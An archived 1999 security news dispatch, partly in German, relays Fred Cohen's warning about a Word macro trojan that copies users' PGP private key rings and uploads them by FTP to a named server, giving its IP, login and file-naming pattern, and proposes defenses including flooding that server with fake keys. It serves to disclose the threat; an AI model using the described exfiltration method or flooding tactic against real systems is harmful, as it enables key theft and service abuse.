search / subscribe / upload / contact












RSS-Feed Depeschen

<< ^ >>

Date: 1999-02-02

Makro-Trojaner klaut PGP Keys

-.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.-

Java-Scripts, die Mail-Adressen klauen können, gibt es
schon länger, einen Visual-Basic-Trojaner, der PGP-Keys
klaut & per ftp verschickt, gab es bisher nicht.
Die Cypherpunks rufen dazu auf, die Übeltäter von
Codebreakers.org zur Arbeitsbeschaffung massenhaft mit
ungültigen Schlüsseln einzudecken, die mit einer starken
Passphrase gesichert sind.
ftp-Adresse c below

-.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.-
Date sent: Tue, 2 Feb 1999 14:19:07 +0100

Bill Stewart
I just got a look at a Word file (CALIG.DOC) that contains
user IDs and passwords to pornographic sites. In addition to
these pointers, it has a Trojan Horse that finds the user's
private PGP key ring and ftp's it to:

209.201.88.110 (codebreakers.org) user anonymous
password itsme@ directory incoming binary mode stored
name: NewSecRingFile[0-9][0-9][0-9][0-9]

This Trojan does its job in visual basic and - except for the
initial notice (if enabled) that macros are present - gives no
indication of this function that it performs. I figure the best
defense against this is to:

1) Have thousands of users ftp phony files to that IP address
and filename on a regular basis, thus making it impossible to
get any real PGP keys - preferably send valid-looking PGP
keys so they have to waste a lot of time cracking them.

2) Cut off all service for ftp with 209.201.88.110
(codebreakers.org) - either at the ISP, at your gateway, or at
the borders to your country.

3) Prosecute for possession of access devices - with
international cooperation between authorities.

4) Tell your people that this has been done so they will stop
looking at pornography listing files fat chance this will work).

At any rate, I hope that you will take prudent precautions
within your organization against this potential attack on the
security of your private keys.

Fred Cohen & Associates: http://all.net - fc@all.net -
tel/fax:925-454-0171 Fred Cohen at Sandia National
Laboratories at tel:925-294-2087 fax:925-294-1225 [Much-too-
long disclaimer omitted, separating the two roles. PGN]

------------------------------

--- end forwarded text

relayed
Robert A. Hettinga
http://www.philodox.com
via Miki San
http://www.gis.at
-.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.-
- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.-
edited by Harkank
published on: 1999-02-02
comments to office@quintessenz.at
subscribe Newsletter
- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.- -.-. --.-
<< ^ >>

BigBrotherAwards Eintritt zur Gala sichern ... 25. Oktober 2023 #BBA23


	CURRENTLY RUNNING
	q/Talk 1.Juli: The Danger of Software Users Don't Control Dr.h.c. Richard Stallman live in Wien, dem Begründer der GPL und des Free-Software-Movements

	!WATCH OUT!
	bits4free 14.Juli 2011: OpenStreetMap Erfinder Steve Coast live in Wien Wie OpenStreetMaps die Welt abbildet und was ein erfolgreiches Crowdsourcing Projekt ausmacht.